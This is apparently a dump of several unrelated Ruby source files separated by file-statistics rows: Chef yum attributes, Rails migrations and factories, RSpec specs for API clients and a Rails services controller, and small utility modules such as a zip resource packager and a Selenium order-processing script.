default['rackspace_yum']['main']['cookbook_template_globalconfig'] = 'rackspace_yum'
default['rackspace_yum']['main']['cookbook_template_repository'] = 'rackspace_yum'
default['rackspace_yum']['main']['distroverpkg'] = "#{node['platform']}-release"
default['rackspace_yum']['main']['gpgcheck'] = true # [TrueClass, FalseClass]
default['rackspace_yum']['main']['keepcache'] = false # [TrueClass, FalseClass]
default['rackspace_yum']['main']['logfile'] = '/var/log/yum.log' # /.*/
default['rackspace_yum']['main']['path'] = '/etc/yum.conf' # /.*/
default['rackspace_yum']['main']['tolerant'] = false
default['rackspace_yum']['main']['alwaysprompt'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['assumeyes'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['bandwidth'] = nil # /^\d+$/
default['rackspace_yum']['main']['bugtracker_url'] = nil # /.*/
default['rackspace_yum']['main']['clean_requirements_on_remove'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['color'] = nil # %w{ always never }
default['rackspace_yum']['main']['color_list_available_downgrade'] = nil # /.*/
default['rackspace_yum']['main']['color_list_available_install'] = nil # /.*/
default['rackspace_yum']['main']['color_list_available_reinstall'] = nil # /.*/
default['rackspace_yum']['main']['color_list_available_upgrade'] = nil # /.*/
default['rackspace_yum']['main']['color_list_installed_extra'] = nil # /.*/
default['rackspace_yum']['main']['color_list_installed_newer'] = nil # /.*/
default['rackspace_yum']['main']['color_list_installed_older'] = nil # /.*/
default['rackspace_yum']['main']['color_list_installed_reinstall'] = nil # /.*/
default['rackspace_yum']['main']['color_search_match'] = nil # /.*/
default['rackspace_yum']['main']['color_update_installed'] = nil # /.*/
default['rackspace_yum']['main']['color_update_local'] = nil # /.*/
default['rackspace_yum']['main']['color_update_remote'] = nil # /.*/
default['rackspace_yum']['main']['commands'] = nil # /.*/
default['rackspace_yum']['main']['debuglevel'] = nil # /^\d+$/
default['rackspace_yum']['main']['diskspacecheck'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['enable_group_conditionals'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['errorlevel'] = nil # /^\d+$/
default['rackspace_yum']['main']['exactarch'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['exclude'] = nil # /.*/
default['rackspace_yum']['main']['group_package_types'] = nil # /.*/
default['rackspace_yum']['main']['groupremove_leaf_only'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['history_list_view'] = nil # /.*/
default['rackspace_yum']['main']['history_record'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['history_record_packages'] = nil # /.*/
default['rackspace_yum']['main']['http_caching'] = nil # %w{ packages all none }
default['rackspace_yum']['main']['installonly_limit'] = nil # /\d+/, /keep/
default['rackspace_yum']['main']['installonlypkgs'] = nil # /.*/
default['rackspace_yum']['main']['installroot'] = nil # /.*/
default['rackspace_yum']['main']['keepalive'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['kernelpkgnames'] = nil # /.*/
default['rackspace_yum']['main']['localpkg_gpgcheck'] = nil # [TrueClass,# FalseClass]
default['rackspace_yum']['main']['max_retries'] = nil # /^\d+$/
default['rackspace_yum']['main']['mdpolicy'] = nil # %w{ packages all none }
default['rackspace_yum']['main']['metadata_expire'] = nil # /^\d+$/
default['rackspace_yum']['main']['mirrorlist_expire'] = nil # /^\d+$/
default['rackspace_yum']['main']['multilib_policy'] = nil # %w{ all best }
default['rackspace_yum']['main']['obsoletes'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['overwrite_groups'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['password'] = nil # /.*/
default['rackspace_yum']['main']['persistdir'] = nil # /.*/
default['rackspace_yum']['main']['pluginconfpath'] = nil # /.*/
default['rackspace_yum']['main']['pluginpath'] = nil # /.*/
default['rackspace_yum']['main']['plugins'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['protected_multilib'] = nil # /.*/
default['rackspace_yum']['main']['protected_packages'] = nil # /.*/
default['rackspace_yum']['main']['proxy'] = nil # /.*/
default['rackspace_yum']['main']['proxy_password'] = nil # /.*/
default['rackspace_yum']['main']['proxy_username'] = nil # /.*/
default['rackspace_yum']['main']['recent'] = nil # /^\d+$/
default['rackspace_yum']['main']['repo_gpgcheck'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['reset_nice'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['rpmverbosity'] = nil # %w{ info critical# emergency error warn debug }
default['rackspace_yum']['main']['showdupesfromrepos'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['skip_broken'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['ssl_check_cert_permissions'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['sslcacert'] = nil # /.*/
default['rackspace_yum']['main']['sslclientcert'] = nil # /.*/
default['rackspace_yum']['main']['sslclientkey'] = nil # /.*/
default['rackspace_yum']['main']['sslverify'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['syslog_device'] = nil # /.*/
default['rackspace_yum']['main']['syslog_facility'] = nil # /.*/
default['rackspace_yum']['main']['syslog_ident'] = nil # /.*/
default['rackspace_yum']['main']['throttle'] = nil # [/\d+k/, /\d+M/, /\d+G/]
default['rackspace_yum']['main']['timeout'] = nil # /\d+/
default['rackspace_yum']['main']['tsflags'] = nil # /.*/
default['rackspace_yum']['main']['username'] = nil # /.*/
| 67.422222 | 104 | 0.671885 |
1804e5babc7dbf801c14ede76b9afbd885184330 | 147 | class UserAddPwDigest < ActiveRecord::Migration[6.1]
def change
change_table :users do |t|
t.string :password_digest
end
end
end
| 18.375 | 52 | 0.70068 |
086602f482da0eb24fa60baf0e4d0295ec8808da | 744 | require 'spec_helper'
describe Amazon::Associates do
describe ".item_search" do
context "when omitting required parameters" do
it "should fail" do
proc { Amazon::Associates.item_search(nil) }.should raise_error(Amazon::Associates::RequiredParameterMissing)
end
end
context "when the country is not recognized" do
it "should fail" do
proc { Amazon::Associates.item_search('ruby', :country => :asfdkjjk) }.should raise_error(Amazon::Associates::RequestError)
end
end
context "on valid request" do
before(:all) do
@response = Amazon::Associates.item_search("ruby", :item_page => 2)
end
it_should_behave_like "Amazon Associates response"
end
end
end
| 28.615385 | 131 | 0.682796 |
39a7061968bc33163934a8a5a681e8135c518775 | 1,305 | module Scripto
module PrintCommands
RESET = "\e[0m".freeze
GREEN = "\e[1;37;42m".freeze
YELLOW = "\e[1;37;43m".freeze
RED = "\e[1;37;41m".freeze
attr_accessor :verbose
# Is verbose mode turned on?
def verbose?
!!@verbose
end
# Turn on verbose mode. #vbanner, #vputs and #vprintf will start printing
# now, and file ops will be printed too.
def verbose!
@verbose = true
end
# Print a colored banner to $stderr, but only if #verbose?.
def vbanner(str = nil)
banner(str) if verbose?
end
# Puts to $stderr, but only if #verbose?.
def vputs(str = nil)
$stderr.puts(str) if verbose?
end
# Printf to $stderr, but only if #verbose?.
def vprintf(str, *args)
$stderr.printf(str, *args) if verbose?
end
# Print a colored banner to $stderr in green.
def banner(str, color: GREEN)
now = Time.new.strftime('%H:%M:%S')
s = "#{str} ".ljust(72, ' ')
$stderr.puts "#{color}[#{now}] #{s}#{RESET}"
end
# Print a yellow warning banner to $stderr.
def warning(str)
banner("Warning: #{str}", color: YELLOW)
end
# Print a red error banner to $stderr, then exit.
def fatal(str)
banner(str, color: RED)
exit(1)
end
end
end
| 23.727273 | 77 | 0.584674 |
ab155be0c44b4253ec0f1d242278f7ed53209068 | 377 | FactoryGirl.define do
factory :resource_pool do
sequence(:name) { |n| "rp_#{seq_padded_for_sorting(n)}" }
end
factory :default_resource_pool, :parent => :resource_pool do
is_default true
end
factory :default_resource_pool_with_vms, :parent => :resource_pool do
after(:create) do |rp|
rp.add_child(FactoryGirl.create(:vm_vmware))
end
end
end
| 23.5625 | 71 | 0.710875 |
08cde0f7b7e51662a8ea1143431e913488e46eee | 460 | require_relative '../message_init'
context "Proceed from Previous Message to a Class" do
source = EventStore::Messaging::Controls::Message.example
msg = EventStore::Messaging::Message::Proceed.(source, source.class)
source_metadata = source.metadata
metadata = msg.metadata
test "Constructs the class" do
assert(msg.class == source.class)
end
test "Metadata have precedence" do
assert(metadata.precedence?(source_metadata))
end
end
| 25.555556 | 70 | 0.747826 |
62d9d2680869b5cf4e80a9a2be90479335fb4563 | 140 | class AddTimezoneToUser < ActiveRecord::Migration[4.2]
def change
add_column :users, :time_zone, :string, :default => "UTC"
end
end
| 23.333333 | 61 | 0.714286 |
87552e80be6819f9c197e4c9c1ab8ee351fcf5f8 | 442 | # Copyright (c) 2015 Vault12, Inc.
# MIT License https://opensource.org/licenses/MIT
require 'errors/zax_error'
# There are no saved HPK client/session keys
# Client should prove HPK ownership to establish these keys
module Errors
class HPK_keys < ZAXError
def http_fail
@response_code = :unauthorized
super
warn "#{WARN} key/client_key not found for process command - hpk: #{dumpHex @data[:hpk]}"
end
end
end
| 26 | 95 | 0.714932 |
38b9e90332e31b4cef0a27b8729854e12afcfe36 | 7,716 | # frozen_string_literal: true
# Assessment: assessment model
class Assessment < ApplicationRecord
columns.each do |column|
case column.type
when :text
validates column.name.to_sym, length: { maximum: 2000 }
when :string
validates column.name.to_sym, length: { maximum: 200 }
end
end
has_one :reported_condition, class_name: 'ReportedCondition'
belongs_to :patient
after_save :update_patient_linelist_after_save
before_destroy :update_patient_linelist_before_destroy
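# An assessment counts as symptomatic when at least one symptom group has enough threshold-passing symptoms (group N requires N matches).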
def symptomatic?
symptom_groups = []
reported_condition.symptoms.each do |reported_symptom|
threshold_symptom = get_threshold_symptom(reported_symptom.name)
# Group represents how many have to be true in that group to be considered as symptomatic
symptom_group_index = threshold_symptom&.group || 1
# -1 to convert to 0-based ie: index 0 requires at least 1 true, index 1 requires at least 2 true...
symptom_group_index -= 1
symptom_passes = symptom_passes_threshold(reported_symptom.name, threshold_symptom)
symptom_groups[symptom_group_index] = 0 if symptom_groups[symptom_group_index].nil?
symptom_groups[symptom_group_index] += 1 if symptom_passes
end
symptomatic = false
symptom_groups.each_with_index { |count, index| symptomatic ||= (count >= index + 1) unless count.nil? }
symptomatic
end
# symptom_passes_threshold will return true if the REQUIRED symptom with the given name in the reported condition
# meets the definition of symptomatic as defined in the assocated ThresholdCondition
def symptom_passes_threshold(symptom_name, threshold_symptom = nil)
reported_symptom = reported_condition&.symptoms&.select { |symp| symp.name == symptom_name }&.first
# This will be the case if a symptom is no longer being tracked and the assessments table is looking for its value
return nil if reported_symptom.nil? || reported_symptom.value.nil?
threshold_symptom = get_threshold_symptom(symptom_name) if threshold_symptom.nil?
return false unless threshold_symptom&.required?
return nil if threshold_symptom.nil? || threshold_symptom.value.nil?
threshold_operator = threshold_symptom&.threshold_operator&.downcase
threshold_operator ||= 'less than'
if reported_symptom.type == 'FloatSymptom' || reported_symptom.type == 'IntegerSymptom'
return true if threshold_operator == 'less than' && reported_symptom.value < threshold_symptom.value
return true if threshold_operator == 'less than or equal' && reported_symptom.value <= threshold_symptom.value
return true if threshold_operator == 'greater than' && reported_symptom.value > threshold_symptom.value
return true if threshold_operator == 'greater than or equal' && reported_symptom.value >= threshold_symptom.value
return true if threshold_operator == 'equal' && reported_symptom.value == threshold_symptom.value
return true if threshold_operator == 'not equal' && reported_symptom.value != threshold_symptom.value
elsif reported_symptom.type == 'BoolSymptom'
return reported_symptom.value != threshold_symptom.value if threshold_operator == 'not equal'
# Bool symptom threshold_operator will fall back to equal
return true if reported_symptom.value == threshold_symptom.value
end
false
end
def get_threshold_symptom(symptom_name)
threshold_condition = reported_condition&.threshold_condition
threshold_condition&.symptoms&.select { |symp| symp.name == symptom_name }&.first
end
def get_reported_symptom_value(symptom_name)
reported_symptom = reported_condition.symptoms.select { |symp| symp.name == symptom_name }[0]
# This will be the case if a symptom is no longer being tracked and the assessments table is looking for its value
return nil if reported_symptom.nil?
reported_symptom.value
end
def all_symptom_names
reported_condition&.threshold_condition&.symptoms&.collect { |x| x.name } || []
end
def get_reported_symptom_by_name(symptom_name)
reported_condition&.symptoms&.select { |symp| symp.name == symptom_name }&.first || nil
end
def translations
I18n.backend.send(:init_translations) unless I18n.backend.initialized?
{
en: I18n.backend.send(:translations)[:en][:assessments],
es: I18n.backend.send(:translations)[:es][:assessments],
'es-PR': I18n.backend.send(:translations)[:'es-PR'][:assessments],
so: I18n.backend.send(:translations)[:so][:assessments],
fr: I18n.backend.send(:translations)[:fr][:assessments]
}
end
# Returns a representative FHIR::QuestionnaireResponse for an instance of a Sara Alert Assessment.
# https://www.hl7.org/fhir/observation.html
def as_fhir
FHIR::QuestionnaireResponse.new(
meta: FHIR::Meta.new(lastUpdated: updated_at.strftime('%FT%T%:z')),
id: id,
subject: FHIR::Reference.new(reference: "Patient/#{patient_id}"),
status: 'completed',
item: reported_condition.symptoms.enum_for(:each_with_index).collect do |s, index|
if s.type == 'IntegerSymptom'
FHIR::QuestionnaireResponse::Item.new(text: s.name,
answer: FHIR::QuestionnaireResponse::Item::Answer.new(valueInteger: s.int_value),
linkId: index.to_s)
elsif s.type == 'FloatSymptom'
FHIR::QuestionnaireResponse::Item.new(text: s.name,
answer: FHIR::QuestionnaireResponse::Item::Answer.new(valueDecimal: s.float_value),
linkId: index.to_s)
elsif s.type == 'BoolSymptom'
FHIR::QuestionnaireResponse::Item.new(text: s.name,
answer: FHIR::QuestionnaireResponse::Item::Answer.new(valueBoolean: s.bool_value),
linkId: index.to_s)
end
end
)
end
private
def update_patient_linelist_after_save
if patient.user_defined_symptom_onset.present? && !patient.symptom_onset.nil?
patient.update(
latest_assessment_at: patient.assessments.maximum(:created_at)
)
else
patient.update(
latest_assessment_at: patient.assessments.maximum(:created_at),
symptom_onset: patient.assessments.where(symptomatic: true).minimum(:created_at)
)
end
end
def update_patient_linelist_before_destroy
# latest fever or fever reducer at only needs to be updated upon deletion as it is updated in the symptom model upon symptom creation
if patient.user_defined_symptom_onset.present? && !patient.symptom_onset.nil?
patient.update(
latest_assessment_at: patient.assessments.where.not(id: id).maximum(:created_at),
latest_fever_or_fever_reducer_at: patient.assessments
.where.not(id: id)
.where_assoc_exists(:reported_condition, &:fever_or_fever_reducer)
.maximum(:created_at)
)
else
patient.update(
symptom_onset: patient.assessments.where.not(id: id).where(symptomatic: true).minimum(:created_at),
latest_assessment_at: patient.assessments.where.not(id: id).maximum(:created_at),
latest_fever_or_fever_reducer_at: patient.assessments
.where.not(id: id)
.where_assoc_exists(:reported_condition, &:fever_or_fever_reducer)
.maximum(:created_at)
)
end
end
end
| 47.925466 | 137 | 0.684033 |
21ea5463c97e33d94176f41727fc0dd65eb540e6 | 3,270 | require "spec_helper"
describe Emites::Resources::Taker do
let(:http) { Emites::Http.new("2C58AFD8E960A7BFE0BC912EBF47A960") }
let(:entity_klass) { Emites::Entities::Taker }
let(:params) do
{
email: "[email protected]",
social_reason: "My Fake, Inc",
cnpj: "01001001000113",
fancy_name: "My Fake",
city_inscription: "3304557",
state: "RJ",
city: "3",
neighborhood: "Icaraí",
street_type: "RUA",
street: "Avenida Roberto Silveira - de 472 ao fim - lado par",
number: 43,
zip_code: "24230-163",
phone: "2199999999"
}
end
subject { described_class.new(http) }
it "has a instance of Emites::Http" do
expect(subject.http).to eq http
end
it_behaves_like "bound_notifiers", [:create, :destroy]
describe "#create" do
it "creates a taker" do
VCR.use_cassette("takers/create/success") do
taker = subject.create(params)
expect(taker).to be_a(entity_klass)
expect(taker.cnpj).to eq(params[:cnpj])
end
end
it "returns RequestError" do
VCR.use_cassette("takers/create/error") do
expect {
subject.create({ email: "[email protected]" })
}.to raise_error(Emites::RequestError)
end
end
end
describe "#info" do
it "returns a Taker instance where id is 135" do
VCR.use_cassette("takers/info/success") do
taker = subject.info(135)
expect(taker).to be_a(entity_klass)
expect(taker.cnpj).to eq("01001001000113")
end
end
it "returns RequestError" do
VCR.use_cassette("takers/info/error") do
expect {
subject.info(136)
}.to raise_error(Emites::RequestError)
end
end
end
describe "#list" do
it "returns an array of takers" do
VCR.use_cassette("takers/list/success") do
entities = subject.list
expect(entities).to be_a(Emites::Entities::Collection)
entities.each do |e|
expect(e).to be_a(entity_klass)
end
end
end
end
describe "#search" do
it "returns an array of takers where CNPJ is '01001001000113'" do
VCR.use_cassette("takers/search/success") do
entities = subject.search({ cnpj: "01001001000113" })
expect(entities).to be_a(Emites::Entities::Collection)
expect(entities.count).to eq(1)
entities.each do |e|
expect(e).to be_a(entity_klass)
end
end
end
it "returns empty" do
VCR.use_cassette("takers/search/returns_empty") do
entities = subject.search({ cnpj: "1775" })
expect(entities).to be_a(Emites::Entities::Collection)
expect(entities).to be_empty
end
end
end
describe "#destroy" do
it "deletes a taker" do
VCR.use_cassette("takers/destroy/success") do
result = subject.destroy(135)
expect(result).to be_truthy
end
end
it "returns RequestError" do
VCR.use_cassette("takers/destroy/error") do
expect {
subject.destroy(136)
}.to raise_error(Emites::RequestError)
end
end
end
end
| 27.711864 | 78 | 0.599388 |
ff867538bc19aad578077b291bb9653e8c862339 | 529 | class NYTInterface
def self.fetch_stories_for_category(category)
response = HTTParty.get("https://api.nytimes.com/svc/topstories/v2/#{category}.json?api-key=rVFIgSZh3fGk0wXTzOl48y89ozhV54uh").body # abstracted away the category, allowing this code to be used more flexibly.
if response.include?("Section not found")
return nil
else
JSON.parse(response)["results"].first(3) # return the first three stories for the given category
end
end
end | 44.083333 | 208 | 0.697543 |
ac30f56379ed371ba860d978c4adbde16a12b9b9 | 3,960 | require 'spec_helper'
require 'tempfile'
# Time to add your specs!
# http://rspec.info/
TMDB_API_KEY = '7a2f6eb9b6aa01651000f0a9324db835'
describe "TmdbProfile" do
before(:all) do
File.mkdirs(TMPDIR)
end
before(:each) do
# tt0465234 => National Treasure: Book of Secrets
@profile = TmdbProfile.first(:imdb_id => 'tt0465234', :api_key => TMDB_API_KEY)
end
after(:each) do
Dir.glob(File.join(TMPDIR,'tmdb_profile_spec*')).each { |filename| File.delete(filename) }
end
describe "Finder" do
it "should find by imdb_id" do
@profile.should_not == nil
end
end
describe "Contents" do
it "should find tmdb id" do
@profile.movie['idents'].first.should == '6637'
end
it "should find fanarts" do
@profile.movie['fanarts'].size.should == 3
end
it "should find posters" do
@profile.movie['posters'].size.should == 4
end
it "should find the tmdb url" do
@profile.movie['urls'].first.should == 'http://www.themoviedb.org/movie/6637'
end
it "should find the imdb_id" do
@profile.movie['imdb_ids'].first.should == 'tt0465234'
end
it "should find the title" do
@profile.movie['titles'].first.should == 'National Treasure: Book of Secrets'
end
it "should find the short_overview" do
@profile.movie['short_overviews'].first.should =~ /Benjamin Franklin Gates/
end
it "should find the type" do
@profile.movie['types'].first.should == 'movie'
end
it "should find the alternative_titles" do
@profile.movie['alternative_titles'].first.should == 'National Treasure 2'
end
it "should find the release" do
@profile.movie['releases'].first.should == '2007-12-13'
end
it "should find the score" do
@profile.movie['scores'].first.should == '1.0'
end
end
describe "XML" do
it "should be able to convert to xml" do
xml = @profile.to_xml
(xml.should_not be_nil) && (xml.length.should > 0)
end
it "should be able to convert to xml and then from xml" do
hash = nil
begin
xml = @profile.to_xml
hash = XmlSimple.xml_in(xml)
rescue
hash = nil
end
hash.should_not be_nil
end
end
describe "File" do
it "should save the profile to a file" do
filespec = get_temp_filename
profile = TmdbProfile.first(:imdb_id => 'tt0465234', :api_key => TMDB_API_KEY, :filespec => filespec)
(File.exist?(filespec).should be_true) && (File.size(filespec).should > 0)
end
# now let's test caching the profile to/from a file
it "should not create a file if a :filespec option is passed that is nil" do
profile = TmdbProfile.first(:imdb_id => 'tt0465234', :api_key => TMDB_API_KEY, :filespec => nil)
Dir.glob(File.join(TMPDIR, "imdb_profile_spec*")).empty?.should be_true
end
it "should create a file if a :filespec option is passed" do
filespec = get_temp_filename
profile = TmdbProfile.first(:imdb_id => 'tt0465234', :api_key => TMDB_API_KEY, :filespec => filespec)
(File.exist?(filespec) && (File.size(filespec) > 0)).should be_true
end
it "should load from a file if a :filespec option is passed and the file exists" do
filespec = get_temp_filename
profile1 = TmdbProfile.first(:imdb_id => 'tt0465234', :api_key => TMDB_API_KEY, :filespec => filespec)
profile2 = TmdbProfile.first(:api_key => TMDB_API_KEY, :filespec => filespec)
profile1.imdb_id.should == profile2.imdb_id
end
it "should not load from a file if a :filespec option is passed and the file does not exists" do
filespec = get_temp_filename
profile = TmdbProfile.first(:api_key => TMDB_API_KEY, :filespec => filespec)
profile.should be_nil
end
end
def get_temp_filename
outfile = Tempfile.new('tmdb_profile_spec', TMPDIR)
filespec = outfile.path
outfile.unlink
filespec
end
end
| 28.695652 | 108 | 0.658333 |
6163e162a5076fe24a68e7abf8600db5861e25f4 | 619 | class TokyoMetro::App::Renderer::TravelTimeInfo::MetaClass::MultipleRailwayLines < TokyoMetro::Factory::Decorate::MetaClass
def initialize( request , railway_line_infos )
super( request )
set_railway_line_infos( railway_line_infos )
common_procedures_when_initialize
end
include ::TokyoMetro::App::Renderer::TravelTimeInfo::MetaClass::Columns
include ::TokyoMetro::App::Renderer::TravelTimeInfo::MetaClass::Common
private
def set_railway_line_infos( railway_line_infos )
@railway_line_infos = railway_line_infos
end
def railway_line_info_base
@main_railway_line_info
end
end
| 26.913043 | 123 | 0.785137 |
03e02f3947483c4a11122f75ebd796cff3e61237 | 55 | #!/usr/bin/env ruby
require __dir__ + '/browserid.rb'
| 13.75 | 33 | 0.690909 |
bf18e74adfaa353ed68f0ad3e1f0ba26aa2f1b6a | 2,210 | require 'zip'
require_relative '../lib/presentation_merger'
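# Packages a download's teacher resources, pupil resources, and merged slide decks into a single zip bundle.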
class ResourcePackager
attr_accessor :download
def initialize(download)
@download = download
@lesson_parts = download.lesson_parts
end
def lesson_bundle
build_lesson_bundle.tap(&:rewind)
end
def filename
download.lesson.name.parameterize
end
private
def activities
@lesson_parts.values
end
def slide_decks
activities.map(&:slide_deck_resource).compact
end
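# Downloads each attached slide deck into a binary tempfile so the decks can be merged locally.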
def slide_decks_tempfiles
@slide_decks_tempfiles ||= slide_decks
.select { |slide_deck| slide_deck.file.attached? }
.map do |slide_deck|
file = Tempfile.open('ResourcePackager-') do |tempfile|
tempfile.binmode
slide_deck.file.download { |chunk| tempfile.write(chunk) }
tempfile.flush
tempfile.rewind
tempfile
end
file
end
end
def combined_slide_decks
return nil unless has_slide_decks?
@combined_slide_decks ||= PresentationMerger.write_buffer do |pres|
slide_decks_tempfiles.each do |file|
pres << file
end
end
@combined_slide_decks
ensure
slide_decks_tempfiles.each(&:close!)
@combined_slide_decks
end
def has_slide_decks?
slide_decks.any? { |slide_deck| slide_deck.file.attached? }
end
def pupil_resource_blobs
PupilResource.where(activity: activities).includes(:file_attachment).map(&:file).map(&:blob)
end
def teacher_resource_blobs
TeacherResource.where(activity: activities).includes(:file_attachment).map(&:file).map(&:blob)
end
def build_lesson_bundle
Zip::OutputStream.write_buffer do |zip|
teacher_resource_blobs.each { |blob| add_to_zip(zip, blob, resource_type: 'teacher') }
pupil_resource_blobs.each { |blob| add_to_zip(zip, blob, resource_type: 'pupil') }
add_presentation_to_zip(zip)
end
end
def add_to_zip(zip, blob, resource_type:)
zip.put_next_entry(File.join(resource_type, blob.filename.to_s))
zip.write(blob.download)
end
def add_presentation_to_zip(zip)
if has_slide_decks?
zip.put_next_entry("#{filename}.odp")
zip.write(combined_slide_decks.string)
end
end
end
| 24.285714 | 98 | 0.703167 |
115713763d889516b65b0286c1058fd35464c0d5 | 707 | module TranslationsManager
class TransifexConfigFileUpdater
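# Illustrative sketch of the config line this class parses (the language
# codes are hypothetical, not taken from a real Transifex project):
#
#   lang_map = en_GB: en-GB, pt_BR: pt-BR
#
# For a file containing that line, read_lang_map returns
# { "en_GB" => "en-GB", "pt_BR" => "pt-BR" }.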
def self.read_lang_map(file)
file.each_line do |line|
if line =~ /lang_map = (.*)/i
return Hash[$1.split(',').sort.map { |x| x.split(':').map(&:strip) }]
end
end
end
def self.update_lang_map(file, languages)
lines = []
languages = languages.map { |k, v| "#{k}: #{v}" }.sort.join(', ')
file.each_line do |line|
if line =~ /lang_map = (.*)/i
lines << "lang_map = #{languages}\n"
else
lines << line
end
end
file.truncate(0)
file.rewind
lines.each do |line|
file.puts line
end
end
end
end
| 22.09375 | 79 | 0.526167 |
39eb8c42cb11afdb3085187005727e5778c88885 | 1,900 | require 'selenium-webdriver'
require_relative 'treatment/processor'
def run_botascript
# 1 Find orders to execute
# => Alive, exec triggered, not processing
taff = Order.exec_scope()
# 2 Mark them IN_PROCESS:
taff.each do |order|
order.update(processing: true)
# Mark the orders IN_PROCESS
end
# 3 Run the orders in parallel:
sons = []
taff.each do |order|
sons << fork do
# 3.0.b Make sure the DB connection is alive:
preventive_db_reconnection()
# 3.1 Create the web browser:
options = Selenium::WebDriver::Chrome::Options.new
options.add_argument('--headless')
browser = Selenium::WebDriver.for :chrome#, options: options
# 3.2 Hand off to the processor that will handle the order:
processor = Processor.new(order, browser)
processor.proceed(mode="testing")
end
# The child process is done past this point....
end
# 4 Give them 10 minutes to finish, otherwise kill:
terminated_sons =[]
begin
Timeout.timeout(60*10) do
sons.size.times {terminated_sons << Process.wait}
end
rescue Timeout::Error
unterminated_sons = sons.select{|son| !terminated_sons.include?(son) }
unterminated_sons.each do |son|
Process.kill 9, son
Process.wait son
# ENHANCEMENT: Record which order each unterminated child was running, and log the failure!
end
end
# 5 Clear the IN_PROCESS attribute: "processing"
taff.each do |order|
order.update(processing: false)
# Mark the orders NOT_IN_PROCESS
end
# 6 Write GLOBAL Botascript execution logs (logs.txt, not the DB!)
# => Did Botascript have to kill its child processes?
key = "#{Time.now}"
value = (unterminated_sons.nil? || unterminated_sons.empty?) ? "No infanticide" : "I killed #{unterminated_sons.size} of my children..."
log = "{\"#{key}\": \"#{value}\"};"
return log
end
| 29.230769 | 142 | 0.671579 |
e8fb0ee29e587ca5a5860a30932cab2eb803e3ac | 547 | # -*- ruby -*-
namespace :mspec do
desc "Synchronize mspec with another checkout"
task :sync do
unless dir = ENV['DIR']
raise "Use DIR= to specify a checkout of mspec"
end
unless File.directory?(dir)
raise "#{dir} isn't an mspec checkout. Use 'cd ~/git; git clone git://github.com/brixen/mspec.git'"
end
rsync dir + "/*", "mspec"
version = Dir.chdir(ENV['DIR']) { `git log --pretty=oneline -1`[0..7] }
sh "git add mspec/"
sh "git commit -m 'Updated MSpec source to #{version}.' mspec"
end
end
| 26.047619 | 105 | 0.61426 |
9151d1fad6da1ce94b7ee88dc0c2dd6d446c0580 | 91 | require 'test_helper'
class ClientProjectAssignmentsHelperTest < ActionView::TestCase
end
| 18.2 | 63 | 0.857143 |
79ca5553f99935aec057976090b551c13405a318 | 1,481 | module Sage300Kit
class Client
module OE
module Invoices
# Get all records:
# client.get_invoices('COMPANY')
# Get records using a range:
# client.get_invoices('COMPANY', '$skip':5, '$top':2)
# Get records using filter:
# client.get_invoices('COMPANY', '$filter':"City eq 'Miami'")
# Get records using complex filter:
# client.get_invoices('COMPANY', '$filter':"CustomerNumber eq '112321' and InvoiceAmountDue gt 0")
# Get records with subset of properties:
# client.get_invoices('COMPANY', '$select':'OrderNumber, BillTo')
#
# Query Parameters:
# $filter -> String
# $select -> Array
# $top -> Integer
# $skip - >Integer
# $count -> boolean
def get_invoices(company, options = {})
res = self.class.get("/#{company}/OE/OEInvoices", {query: options})
Sage300Kit::Object.new(res)
end
# Get record by key:
# client.get_invoice('COMPANY', 10021638)
# Get records with subset of properties:
# client.get_invoice('COMPANY', '$select':'InvoiceNumber, BillTo')
#
# Query Parameters:
# $select -> Array
def get_invoice(company, invoice_id, options = {})
res = self.class.get("/#{company}/OE/OEInvoices(#{invoice_id})", {query: options})
Sage300Kit::Object.new(res)
end
end
end
end
end
| 33.659091 | 108 | 0.56921 |
79784bad67ecd23a19b7e61d4f655f2b97c98e47 | 14,362 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Projects::ServicesController do
include JiraServiceHelper
include AfterNextHelpers
let_it_be(:project) { create(:project, :repository) }
let_it_be(:user) { create(:user) }
let_it_be(:jira_integration) { create(:jira_integration, project: project) }
let(:integration) { jira_integration }
let(:integration_params) { { username: 'username', password: 'password', url: 'http://example.com' } }
before do
sign_in(user)
project.add_maintainer(user)
end
it_behaves_like Integrations::Actions do
let(:integration_attributes) { { project: project } }
let(:routing_params) do
{
namespace_id: project.namespace,
project_id: project,
id: integration.to_param
}
end
end
describe '#test' do
context 'when the integration is not testable' do
it 'renders 404' do
allow_any_instance_of(Integration).to receive(:testable?).and_return(false)
put :test, params: project_params
expect(response).to have_gitlab_http_status(:not_found)
end
end
context 'when validations fail' do
let(:integration_params) { { active: 'true', url: '' } }
it 'returns error messages in JSON response' do
put :test, params: project_params(service: integration_params)
expect(json_response['message']).to eq 'Validations failed.'
expect(json_response['service_response']).to include "Url can't be blank"
expect(response).to be_successful
end
end
context 'when successful' do
context 'with empty project' do
let_it_be(:project) { create(:project) }
context 'with chat notification integration' do
let_it_be(:teams_integration) { project.create_microsoft_teams_integration(webhook: 'http://webhook.com') }
let(:integration) { teams_integration }
it 'returns success' do
allow_next(::MicrosoftTeams::Notifier).to receive(:ping).and_return(true)
put :test, params: project_params
expect(response).to be_successful
end
end
it 'returns success' do
stub_jira_integration_test
expect(Gitlab::HTTP).to receive(:get).with('/rest/api/2/serverInfo', any_args).and_call_original
put :test, params: project_params(service: integration_params)
expect(response).to be_successful
end
end
it 'returns success' do
stub_jira_integration_test
expect(Gitlab::HTTP).to receive(:get).with('/rest/api/2/serverInfo', any_args).and_call_original
put :test, params: project_params(service: integration_params)
expect(response).to be_successful
end
context 'when service is configured for the first time' do
let(:integration_params) do
{
'active' => '1',
'push_events' => '1',
'token' => 'token',
